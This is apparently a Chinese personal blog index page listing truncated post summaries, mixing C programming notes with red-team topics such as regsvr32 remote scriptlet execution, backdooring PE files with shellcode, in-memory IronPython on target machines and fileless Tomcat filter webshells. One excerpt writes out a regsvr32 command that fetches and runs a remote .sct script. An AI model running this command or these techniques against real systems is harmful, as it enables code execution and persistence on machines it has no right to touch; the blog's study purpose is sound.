摘要:原文链接:blog 在对regsvr32的用法进行了解之后,对于Casey Smith的远程js脚本执行命令的思路很感兴趣。 命令语法如下: regsvr32 /s /n /u /i:http://127.0.0.1/file.sct scrobj.dll 原理则是利用com组件的scriptlet 阅读全文
posted @ 2020-10-12 18:10 CN_Simo 阅读(68) 评论(0) 推荐(0) 编辑
摘要:关于文件操作个人比较困惑的地方有两点: 关于w和wb的区别 如何定位文件的读写位置 文件格式和打开模式 c中的文件打开模式分为:文本模式和二进制模式,分别处理文本格式文件和二进制格式文件。 两个模式的主要区别是在换行符的处理上,利用文本模式在写文本内容到文件的时候,需要将换行符转换成系统对应的编码方 阅读全文
posted @ 2020-08-23 00:14 CN_Simo 阅读(88) 评论(0) 推荐(1) 编辑
摘要:假设被调用的DLL存在一个导出函数,原型如下: void printN(int); 三种方式从DLL导入导出函数 生成DLL时使用模块定义 (.def) 文件 在主应用程序的函数定义中使用关键字__declspec(dllimport)或__declspec(dllexport) 利用#pragma 阅读全文
posted @ 2020-08-19 15:26 CN_Simo 阅读(860) 评论(6) 推荐(0) 编辑
摘要:参考 在文章Backdooring PE Files with Shellcode中介绍了一种在正常程序中注入shellcode的方式,让程序以前的逻辑照常能够正常运行,下面复现一下并解决几个小问题。 示例程序代码 这里直接编译一个32位的HelloWorld程序为例: #include <stdi 阅读全文
posted @ 2020-08-19 01:00 CN_Simo 阅读(77) 评论(5) 推荐(0) 编辑
摘要:在目标机器运行python工具 好多工具都是python写的,如果目标机器是linux的话自带python环境可以很方便的运行这些工具,但是windows下是不自带python环境的,所以一种办法是直接在目标环境安装一个python,另外一种就是直接在内存加载python脚本。 而ironpytho 阅读全文
posted @ 2020-08-18 00:18 CN_Simo 阅读(83) 评论(2) 推荐(0) 编辑
摘要:读取输入的方式 相关函数原型(从控制台获取输入,不考虑宽字符): int scanf( const char *format, ... ); int getchar(void); char *gets( char *str ); char *gets_s( char *str, rsize_t n 阅读全文
posted @ 2020-08-18 00:16 CN_Simo 阅读(110) 评论(2) 推荐(1) 编辑
摘要:条件控制 if...else... 大致结构: if(condition) {...} else {...} if(condition) {...} if(condition) {...} else if {...} else {...} switch 结构: switch(variable) { 阅读全文
posted @ 2020-08-18 00:14 CN_Simo 阅读(34) 评论(1) 推荐(0) 编辑
摘要:一维数组及其指针表示法 一维数组: int ar[] = {1,2,3} // 直接初始化,编译器自动获取数组大小 int br[3] = {1,2,3} // 直接指定大小 数组的名字ar其实是一个指针: int *pr = ar; printf("%d\n", pr == ar); // tru 阅读全文
posted @ 2020-08-02 01:02 CN_Simo 阅读(103) 评论(6) 推荐(0) 编辑
摘要:在断断续续的了解c#中,最先想到的就是ASP.NET开发了,在C2中应用也慢慢开始比较广泛了,比如Covenant,有跨平台的特性,值得看一看。 阅读全文
posted @ 2020-07-05 19:58 CN_Simo 阅读(628) 评论(6) 推荐(6) 编辑
摘要:最近,看到好多不错的关于“无文件Webshell”的文章,对其中利用上下文动态的注入Filter的技术做了一下简单验证,写一下测试总结,不依赖任何框架,仅想学习一下tomcat的filter。 阅读全文
posted @ 2020-07-04 16:44 CN_Simo 阅读(378) 评论(3) 推荐(1) 编辑